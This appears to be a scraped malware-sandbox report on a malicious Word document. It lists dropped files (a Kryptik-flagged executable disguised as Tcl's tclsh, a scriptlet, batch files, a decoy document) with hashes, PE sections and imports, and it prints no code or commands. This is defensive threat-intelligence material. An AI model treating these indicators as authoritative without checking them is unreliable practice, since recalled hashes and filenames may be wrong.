AV Scan Result
Labeled as "Kryptik.EDFO" (5/66)

Runtime Process
cmd.exe (PID: 2740)

MD5

af75147e525ed8e52bf728466d66b9d0

SHA1

05493deb5acc8e54f8a500468983b9af61734bef

SHA256

cd9572ab21bae521120a2a0f3bbfd8085512504a2ae9aa217db03164828117c7

Extended File Details

exe.exe

Filename: exe.exe
Size: 51KiB (51712 bytes)
Type: peexe executable
Description: PE32 executable (GUI) Intel 80386, for MS Windows
Architecture
: 32 Bit
MD5
: af75147e525ed8e52bf728466d66b9d0
SHA1
: 05493deb5acc8e54f8a500468983b9af61734bef
SHA256
: cd9572ab21bae521120a2a0f3bbfd8085512504a2ae9aa217db03164828117c7
SHA512
: 8c97db43d6e849e0b37e04392bb63285556c3d1e193bc0c8757836ee930762f26a2b629d59dcbccfb8c760f5fe6c425fab52e7646c4fd45dc6eec257b7c7bf13
ssdeep
: 768:8hVy4LkEy6UQLxpiIxnHdDHoWIjf7PUYPHingAwk0qLE:MVy4LkVCxgEnHyWiPVKgAwkw
imphash
: 30864f7a36ad40a4cf55686100edb507
authentihash
: 7f34d34b27f1a21679531aa8a99a7a90e5302ca3374c389a039eb213b55ebc4b
Compiler/Packer
: Borland Delphi 3.0 (???)

Version Info

FileVersion: 8.6.0
CompanyName: ActiveState Corporation
ProductName: Tcl 8.6 for Windows
ProductVersion: 8.6.0
FileDescription: Tclsh Application
OriginalFilename: tclsh86t.exe
Translation: 0x0409 0x04b0

File Sections

Details	Name	Entropy	Virtual Address	Virtual Size	Raw Size	MD5
Name .text Entropy 6.28756263124 Virtual Address 0x1000 Virtual Size 0x88bf Raw Size 0x8a00 MD5 48a1cba0ce79add4a433d5f38fe75e27	.text	6.28756263124	0x1000	0x88bf	0x8a00	48a1cba0ce79add4a433d5f38fe75e27
Name .rdata Entropy 1.5109243162 Virtual Address 0xa000 Virtual Size 0x1678 Raw Size 0x1800 MD5 eb3e479de15214db15820440188a0750	.rdata	1.5109243162	0xa000	0x1678	0x1800	eb3e479de15214db15820440188a0750
Name .data Entropy 0.848800800142 Virtual Address 0xc000 Virtual Size 0x2e60 Raw Size 0x1600 MD5 48facdc8929d90859ea7651aee807b25	.data	0.848800800142	0xc000	0x2e60	0x1600	48facdc8929d90859ea7651aee807b25
Name .rsrc Entropy 1.999759492 Virtual Address 0xf000 Virtual Size 0x1000 Raw Size 0x1000 MD5 1135c1402f07922134ca5741b280ea63	.rsrc	1.999759492	0xf000	0x1000	0x1000	1135c1402f07922134ca5741b280ea63

File Imports

KERNEL32.dll

CancelIo

CopyFileW

FindClose

FindFirstFileA

FindFirstFileW

FindNextFileW

FormatMessageA

GetCurrentProcess

GetCurrentProcessId

GetCurrentThreadId

GetFileAttributesW

GetFullPathNameW

GetLastError

GetSystemTimeAsFileTime

GetTickCount

InterlockedCompareExchange

InterlockedExchange

IsDebuggerPresent

QueryPerformanceCounter

SetFileAttributesW

SetUnhandledExceptionFilter

Sleep

TerminateProcess

TlsAlloc

UnhandledExceptionFilter

VirtualProtect

Clean 2
- ~WRC0000.tmp
  
  Overview Download Disabled VirusTotal Report Hash Seen Before
  
  Size
  20KiB (20521 bytes)
  
  Type
  docx office
  
  Description
  Microsoft Word 2007+
  
  AV Scan Result
  0/56
  
  Runtime Process
  WINWORD.EXE (PID: 1196)
  
  MD5
  
  6f7f286030aba879282afa865bde9ba5
  
  SHA1
  
  bec66d2dda32c77d5b4c7f2effd879877d677425
  
  SHA256
  
  53c32839ecc275661185b9a41570f0d0b6237ac12f71384c69017358301b0b3d
- inteldriverupd1.sct
  
  Download Disabled VirusTotal Report Hash Seen Before
  
  Size
  423B (423 bytes)
  
  Type
  sct
  
  Description
  XML document, ASCII text, with CRLF line terminators
  
  AV Scan Result
  0/60
  
  Runtime Process
  WINWORD.EXE (PID: 3300)
  
  MD5
  
  1b5a8273e16e717136f7fed172da847a
  
  SHA1
  
  352f0ec7fefdbf3211ffef8aed13a60bb60e6135
  
  SHA256
  
  113e8ad48f1bb20df1c8e6ddeddfb527aedbf85d18b58fcdd146ba544885de34

Informative Selection 3
- 2nd.bat
  
  Download Disabled Hash Seen Before
  
  Size
  2.2KiB (2272 bytes)
  
  Type
  text
  
  Description
  ASCII text, with CRLF line terminators
  
  Runtime Process
  cmd.exe (PID: 2740)
  
  MD5
  
  a079014f23f6f2f169e7edfa090538eb
  
  SHA1
  
  20c83c3dbd3ffd2a78c1c8453a800c625698ebda
  
  SHA256
  
  e815df3fb218435c48a6059cd8fe5fe20e9443550f4334c623befe19d6c1a1b8
- task.bat
  
  Download Disabled Hash Seen Before
  
  Size
  147B (147 bytes)
  
  Type
  text
  
  Description
  ASCII text, with CRLF line terminators
  
  Runtime Process
  cmd.exe (PID: 2956)
  
  MD5
  
  669f7ab1ba185d4123d391dc22bffe26
  
  SHA1
  
  cd8742755f0271723d7b8c3265e192e3e0927c39
  
  SHA256
  
  ecbb35d9ee34e1519e8a437636e173f9628787903c4916f8e107d1070902f34a
- New Microsoft Word Document.docx
  
  Download Disabled
  
  Size
  Unknown (0 bytes)
  
  Type
  empty
  
  Runtime Process
  cmd.exe (PID: 2740)

Informative 10
- 5635DF453843.LNK
  
  Download Disabled Hash Seen Before
  
  Size
  473B (473 bytes)
  
  Type
  lnk
  
  Description
  MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Mar 14 14:00:28 2018, mtime=Wed Mar 14 14:00:28 2018, atime=Wed Mar 14 14:00:37 2018, length=359569, window=hide
  
  Runtime Process
  WINWORD.EXE (PID: 3300)
  
  MD5
  
  a4dc8231fc4ab81d03cc183c32e703b9
  
  SHA1
  
  abf33e561b669d574c19f19302bba7369aa292ac
  
  SHA256
  
  d4e1fce9446c5feb2f8bd3891122e50ae39144359f64afb71b05d04fe8207637
- ~$Normal.dotm
  
  Download Disabled Hash Seen Before
  
  Size
  162B (162 bytes)
  
  Type
  data
  
  Runtime Process
  WINWORD.EXE (PID: 3300)
  
  MD5
  
  81fd13b23806cccb2f5d94b27fb1a049
  
  SHA1
  
  d8309abe9046840fb32ad264551597c0b1318913
  
  SHA256
  
  9d1a83e4e20969295f8af6f73e31bbf59b0711d6da791bebb73ad081de289064
- index.dat
  
  Download Disabled Hash Seen Before
  
  Size
  153B (153 bytes)
  
  Type
  data
  
  Runtime Process
  exe.exe (PID: 2300)
  
  MD5
  
  20c5e14268834daf79175433f0310953
  
  SHA1
  
  5af7b0498ceeecc21ccf680b3a783e67b5af986a
  
  SHA256
  
  a86fd6e1cfca82d07405c8ca2609314f9146e816cff6ae6c0c427d87b1478aa9
- essxemdbwmsiaiagmfdi[1]
  
  Download Disabled Hash Seen Before
  
  Size
  11KiB (11272 bytes)
  
  Type
  data
  
  Runtime Process
  exe.exe (PID: 2300)
  
  MD5
  
  c54cd7c69586c03663c117181d668692
  
  SHA1
  
  fb42983f3430d9a669ff980b0fb2bf166c087353
  
  SHA256
  
  873fb1d60791614a7c14ee6e5e27697a45315c57235ec35be01127ddb97747f2
- ~WRS{7D260DD4-47A3-49BD-BA04-FB1EB18F2FF6}.tmp
  
  Overview Download Disabled Hash Seen Before
  
  Size
  1KiB (1024 bytes)
  
  Type
  data
  
  Runtime Process
  WINWORD.EXE (PID: 3300)
  
  MD5
  
  5d4d94ee7e06bbb0af9584119797b23a
  
  SHA1
  
  dbb111419c704f116efa8e72471dd83e86e49677
  
  SHA256
  
  4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
- ~WRS{9A8B9126-72CE-4F0C-9C8F-478613DB8E61}.tmp
  
  Overview Download Disabled Hash Seen Before
  
  Size
  1KiB (1024 bytes)
  
  Type
  data
  
  Runtime Process
  WINWORD.EXE (PID: 1196)
  
  MD5
  
  5d4d94ee7e06bbb0af9584119797b23a
  
  SHA1
  
  dbb111419c704f116efa8e72471dd83e86e49677
  
  SHA256
  
  4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
- ~WRS{E674B11D-078C-4013-8D68-BC57AFC19CCF}.tmp
  
  Download Disabled Hash Seen Before
  
  Size
  1.7KiB (1742 bytes)
  
  Type
  doc office
  
  Description
  data
  
  Runtime Process
  WINWORD.EXE (PID: 3300)
  
  MD5
  
  e76e8230be2ef4861024fe70cf272df6
  
  SHA1
  
  d15f09e8a48c47bef2bd3d9ad0791bd295b16ffa
  
  SHA256
  
  f0bf4e2d0ffea8635378c06af8483e3e284a73d7bee6f5307cb4e8616ddb844b
- 4175349.cvr
  
  Download Disabled Hash Seen Before
  
  Size
  1.1KiB (1148 bytes)
  
  Type
  data
  
  Runtime Process
  WINWORD.EXE (PID: 3300)
  
  MD5
  
  e7275861231f2fb12a7e858d63aa0d30
  
  SHA1
  
  51bdab162a8e83c4ac7f2a1ba75fb9c652bf43a7
  
  SHA256
  
  aa94cc7c80030e1404ab42bb9a6cbd3be9e5907264defbf8bee3323e0a3e1bdb
- decoy.doc
  
  Download Disabled Hash Seen Before
  
  Size
  26KiB (26624 bytes)
  
  Type
  doc office
  
  Description
  Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Fiji, Template: Normal.dotm, Last Saved By: Fiji, Revision Number: 17, Name of Creating Application: Microsoft Office Word, Total Editing Time: 08:00, Create Time/Date: Sun Feb 25 20:18:00 2018, Last Saved Time/Date: Wed Mar 14 09:53:00 2018, Number of Pages: 2, Number of Words: 571, Number of Characters: 3255, Security: 0
  
  Runtime Process
  cmd.exe (PID: 2740)
  
  MD5
  
  46df33278d2794d3669aefba5d93f868
  
  SHA1
  
  02d9e9dd20a94d1bd2b253e677d841a37a46c1d1
  
  SHA256
  
  07e749260a44576c08f560b62a9d5bcdaa534d682e0e1f8e4a35b14d29a13bb3
- ~$35DF453843.doc
  
  Download Disabled Hash Seen Before
  
  Size
  162B (162 bytes)
  
  Type
  data
  
  Runtime Process
  WINWORD.EXE (PID: 3300)
  
  MD5
  
  81fd13b23806cccb2f5d94b27fb1a049
  
  SHA1
  
  d8309abe9046840fb32ad264551597c0b1318913
  
  SHA256
  
  9d1a83e4e20969295f8af6f73e31bbf59b0711d6da791bebb73ad081de289064

5635DF453843.doc

Incident Response

Risk Assessment

Additional Context

Related Sandbox Artifacts

Indicators

Malicious Indicators 5

Suspicious Indicators 12

Informative 25

File Details

5635DF453843.doc

Resources

Visualization

Classification (TrID)

Screenshots

System Resource Monitor

Hybrid Analysis

Network Analysis

DNS Requests

Contacted Hosts

Contacted Countries

HTTP Traffic

Extracted Strings

Extracted Files

Malicious 1

exe.exe

Clean 2

~WRC0000.tmp

inteldriverupd1.sct

Informative Selection 3

2nd.bat

task.bat

Informative 10

Notifications

Runtime

Community

Latest News

Vetting required

Request Report Deletion

Link